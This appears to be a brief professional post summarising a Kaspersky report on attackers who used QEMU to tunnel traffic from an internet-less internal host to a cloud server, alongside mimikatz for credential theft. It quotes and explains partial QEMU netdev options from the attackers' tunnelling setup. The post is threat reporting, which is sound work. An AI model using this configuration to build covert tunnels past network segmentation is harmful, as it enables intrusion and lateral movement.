Hackers abuse QEMU to covertly tunnel network traffic in cyberattacks.
IMRAN RASHEED
Cyber Security Consultant | Auditor | Risk Assessment | SOC | VAPT| C-CISO | CISSP |
As part of the attack, threat actors used QEMU to create virtual network interfaces and a socket-type network device to connect to a remote server.
QEMU offers unique capabilities such as emulating a wide range of hardware and virtual networks, allowing malicious activities to blend in with benign virtualisation traffic, and bridging segmented network parts through strategically set up VM pivot points.
In the attack seen by Kaspersky, the hackers utilised 'Angry IP Scanner' for network scanning, 'mimikatz' for credential theft, and QEMU for creating a sophisticated network tunnelling setup that facilitated a covert communication channel.
Netdev user,id=lan,restrict=off: Configures a network backend named 'lan' in user mode, allowing unrestricted network access through the host's network stack.
Netdev hub port,id=port-lan,hubid=0,netdev=lan/sock: Links a network device to a virtual hub hubid=0, facilitating connectivity between different backends.
Using QEMU, the attackers established a network tunnel from the targeted internal host that didn't have internet access to a pivot host with internet access, which connects to the attacker's server on the cloud, running a Kali Linux VM.
The ability of QEMU VMs to link seamlessly and bridge segmented network components is critical in bypassing security measures and may also be used to further the breach laterally.